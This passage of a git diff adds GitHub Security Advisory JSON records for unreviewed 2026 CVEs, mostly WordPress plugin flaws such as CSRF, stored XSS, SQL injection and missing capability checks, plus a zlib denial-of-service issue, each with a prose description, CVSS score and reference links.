"2026-02-18T05:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fvjg-wx7c-4qc5/GHSA-fvjg-wx7c-4qc5.json b/advisories/unreviewed/2026/02/GHSA-fvjg-wx7c-4qc5/GHSA-fvjg-wx7c-4qc5.json new file mode 100644 index 0000000000000..b637ccb2b2efb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fvjg-wx7c-4qc5/GHSA-fvjg-wx7c-4qc5.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fvjg-wx7c-4qc5", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1072" + ], + "details": "The Keybase.io Verification plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.5. This is due to missing nonce validation when updating plugin settings. This makes it possible for unauthenticated attackers to update the Keybase verification text via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1072" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-keybase-verification/tags/1.4.5/admin/code/write.php#L51" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-keybase-verification/trunk/admin/code/write.php#L51" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3455171%40wp-keybase-verification&new=3455171%40wp-keybase-verification&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4bbf55eb-7738-4c52-ac9d-a67d159e56cf?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fx3v-rgv7-qq3x/GHSA-fx3v-rgv7-qq3x.json b/advisories/unreviewed/2026/02/GHSA-fx3v-rgv7-qq3x/GHSA-fx3v-rgv7-qq3x.json new file mode 100644 index 0000000000000..b2bca67c84fe9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fx3v-rgv7-qq3x/GHSA-fx3v-rgv7-qq3x.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fx3v-rgv7-qq3x", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-1277" + ], + "details": "The URL Shortify plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.12.1 due to insufficient validation on the 'redirect_to' parameter in the promotional dismissal handler. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites via a crafted link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1277" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/url-shortify/tags/1.11.4/lite/includes/Promo.php#L64" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3451740%40url-shortify&old=3445491%40url-shortify&sfp_email=&sfph_mail=#file1049" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7c1dc51-47ca-4b2f-9ff9-275bd8b1c106?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g4wh-mv47-2hg5/GHSA-g4wh-mv47-2hg5.json b/advisories/unreviewed/2026/02/GHSA-g4wh-mv47-2hg5/GHSA-g4wh-mv47-2hg5.json new file mode 100644 index 0000000000000..967128fbf512b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g4wh-mv47-2hg5/GHSA-g4wh-mv47-2hg5.json @@ -0,0 +1,80 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g4wh-mv47-2hg5", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1304" + ], + "details": "The Membership Plugin – Restrict Content for WordPress is vulnerable to Stored Cross-Site Scripting via multiple invoice settings fields in all versions up to, and including, 3.2.18 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1304" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L896" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L905" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L914" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L923" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L932" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L941" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L950" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L971" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/templates/invoice.php#L271" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/templates/invoice.php#L281" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3448964%40restrict-content&new=3448964%40restrict-content&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cdd563b7-a1b9-4d99-9a6e-c8acf9dda619?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g8mp-px4h-fw43/GHSA-g8mp-px4h-fw43.json b/advisories/unreviewed/2026/02/GHSA-g8mp-px4h-fw43/GHSA-g8mp-px4h-fw43.json new file mode 100644 index 0000000000000..1a0c1a1a955a8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g8mp-px4h-fw43/GHSA-g8mp-px4h-fw43.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g8mp-px4h-fw43", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1714" + ], + "details": "The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution plugin for WordPress is vulnerable to Email Relay Abuse in all versions up to, and including, 3.3.2. This is due to the lack of validation on the 'send_to', 'product_title', 'wlmessage', and 'wlemail' parameters in the 'woolentor_suggest_price_action' AJAX endpoint. This makes it possible for unauthenticated attackers to send arbitrary emails to any recipient with full control over the subject line, message content, and sender address (via CRLF injection in the 'wlemail' parameter), effectively turning the website into a full email relay for spam or phishing campaigns.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1714" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/3.3.1/classes/class.ajax_actions.php#L170" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/3.3.1/classes/class.ajax_actions.php#L189" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/3.3.1/classes/class.ajax_actions.php#L192" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L170" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L189" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L192" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3461704/woolentor-addons/trunk/classes/class.ajax_actions.php?contextall=1" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cf326914-6a38-4984-a2a7-66e05f41a96b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-93" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gcff-gvxv-7jgm/GHSA-gcff-gvxv-7jgm.json b/advisories/unreviewed/2026/02/GHSA-gcff-gvxv-7jgm/GHSA-gcff-gvxv-7jgm.json new file mode 100644 index 0000000000000..3f58906b72c53 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gcff-gvxv-7jgm/GHSA-gcff-gvxv-7jgm.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcff-gvxv-7jgm", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1931" + ], + "details": "The Rent Fetch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'keyword' parameter in all versions up to, and including, 0.32.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1931" + }, + { + "type": "WEB", + "url": "https://github.com/BrindleDigital/rentfetch/commit/3c7162b24a8be5e5399c1a5bbaf0b949127aca75" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/rentfetch/tags/0.32.4/lib/admin/options-sections/options-general-section.php#L225" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/rentfetch/trunk/lib/admin/options-sections/options-general-section.php#L225" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3458366%40rentfetch&new=3458366%40rentfetch&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3fffdda5-91ed-4b79-bc04-77a1c44e3b67?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ghf8-ggp8-97wj/GHSA-ghf8-ggp8-97wj.json b/advisories/unreviewed/2026/02/GHSA-ghf8-ggp8-97wj/GHSA-ghf8-ggp8-97wj.json new file mode 100644 index 0000000000000..03403a15be506 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ghf8-ggp8-97wj/GHSA-ghf8-ggp8-97wj.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ghf8-ggp8-97wj", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27033" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27033" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h858-mf2m-8jf4/GHSA-h858-mf2m-8jf4.json b/advisories/unreviewed/2026/02/GHSA-h858-mf2m-8jf4/GHSA-h858-mf2m-8jf4.json new file mode 100644 index 0000000000000..c3403ed1b4840 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h858-mf2m-8jf4/GHSA-h858-mf2m-8jf4.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h858-mf2m-8jf4", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27171" + ], + "details": "zlib before 1.3.2 allows CPU consumption via crc32_combine64 and crc32_combine_gen64 because x2nmodp can do right shifts within a loop that has no termination condition.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27171" + }, + { + "type": "WEB", + "url": "https://github.com/madler/zlib/issues/904" + }, + { + "type": "WEB", + "url": "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit" + }, + { + "type": "WEB", + "url": "https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf" + }, + { + "type": "WEB", + "url": "https://github.com/madler/zlib/releases/tag/v1.3.2" + }, + { + "type": "WEB", + "url": "https://ostif.org/zlib-audit-complete" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1284" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jg87-hjf9-gf64/GHSA-jg87-hjf9-gf64.json b/advisories/unreviewed/2026/02/GHSA-jg87-hjf9-gf64/GHSA-jg87-hjf9-gf64.json new file mode 100644 index 0000000000000..49abac32aeac3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jg87-hjf9-gf64/GHSA-jg87-hjf9-gf64.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jg87-hjf9-gf64", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27037" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27037" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m3jj-4hf6-wgch/GHSA-m3jj-4hf6-wgch.json b/advisories/unreviewed/2026/02/GHSA-m3jj-4hf6-wgch/GHSA-m3jj-4hf6-wgch.json new file mode 100644 index 0000000000000..a78a994cc52e4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m3jj-4hf6-wgch/GHSA-m3jj-4hf6-wgch.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m3jj-4hf6-wgch", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27035" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27035" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mcrh-3qmp-x37p/GHSA-mcrh-3qmp-x37p.json b/advisories/unreviewed/2026/02/GHSA-mcrh-3qmp-x37p/GHSA-mcrh-3qmp-x37p.json new file mode 100644 index 0000000000000..f6fa77ad5c9c7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mcrh-3qmp-x37p/GHSA-mcrh-3qmp-x37p.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mcrh-3qmp-x37p", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-12356" + ], + "details": "The Tickera – Sell Tickets & Manage Events plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_change_ticket_status' AJAX endpoint in all versions up to, and including, 3.5.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update post/event statuses.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12356" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/tickera-event-ticketing-system/trunk/tickera.php#L3903" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3422813" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e7c08b1a-c73d-488c-96df-cf18acb460bb?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json b/advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json new file mode 100644 index 0000000000000..6a94e565ad909 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pj33-46c7-rm7p", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-2023" + ], + "details": "The WP Plugin Info Card plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.2.0. This is due to missing nonce validation in the ajax_save_custom_plugin() function, which is disabled by prefixing the check with 'false &&'. This makes it possible for unauthenticated attackers to create or modify custom plugin entries via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2023" + }, + { + "type": "WEB", + "url": "https://github.com/DLXPlugins/wp-plugin-info-card/blob/0fe50d3ccb3d61d5d176fab9e9f280ac8bfd8614/php/Admin/Init.php#L390" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-plugin-info-card/tags/6.2.0/php/Admin/Init.php#L390" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-plugin-info-card/trunk/php/Admin/Init.php#L390" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3454992%40wp-plugin-info-card&new=3454992%40wp-plugin-info-card&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1213a21f-a9c1-4da3-99b5-4a5a0673073f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json b/advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json new file mode 100644 index 0000000000000..de9398f896eab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qph2-xm7h-wv73", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-2576" + ], + "details": "The Business Directory Plugin – Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'payment' parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2576" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/business-directory-plugin/tags/6.4.21/includes/controllers/pages/class-checkout.php#L126" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/business-directory-plugin/tags/6.4.21/includes/db/class-db-query-set.php#L37" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3463307/business-directory-plugin/trunk/includes/db/class-db-query-set.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d8ec7d25-1574-416c-b5fd-3a71b1cc09d2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json b/advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json new file mode 100644 index 0000000000000..465c984583a48 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qw9p-rfpx-fxh5", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-12075" + ], + "details": "The Order Splitter for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'wos_troubleshooting' AJAX endpoint in all versions up to, and including, 5.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view information pertaining to other user's orders.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12075" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3387820%40woo-order-splitter&new=3387820%40woo-order-splitter&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/627eb000-086e-408a-8123-063fed6364be?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json b/advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json new file mode 100644 index 0000000000000..889d69c0fb852 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgq3-q5rc-mjc3", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1906" + ], + "details": "The PDF Invoices & Packing Slips for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.6.0 via the `wpo_ips_edi_save_order_customer_peppol_identifiers` AJAX action due to missing capability checks and order ownership validation. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify Peppol/EDI endpoint identifiers (`peppol_endpoint_id`, `peppol_endpoint_eas`) for any customer by specifying an arbitrary `order_id` parameter on systems using Peppol invoicing. This can affect order routing on the Peppol network and may result in payment disruptions and data leakage.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1906" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-pdf-invoices-packing-slips/tags/5.6.0/includes/Admin.php#L72" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-pdf-invoices-packing-slips/tags/5.6.0/includes/Admin.php#L895" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2e1922c6-e63b-47aa-97de-1e2382fa25d3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json b/advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json new file mode 100644 index 0000000000000..1d82bf0a60c65 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rj4g-w683-5gq4", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1925" + ], + "details": "The EmailKit – Email Customizer for WooCommerce & WP plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the 'update_template_data' function in all versions up to, and including, 1.6.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify the title of any post on the site, including posts, pages, and custom post types.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1925" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.2/includes/Admin/EmailKitAjax.php#L150" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/EmailKitAjax.php#L150" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3456972/emailkit/trunk?contextall=1&old=3419280&old_path=%2Femailkit%2Ftrunk#file1" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f131ea1e-d652-4854-abea-6a307ca8118f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json b/advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json new file mode 100644 index 0000000000000..016f1de2f6a51 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vfcp-69jm-85xv", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27034" + ], + "details": "Rejected reason: Not used", + 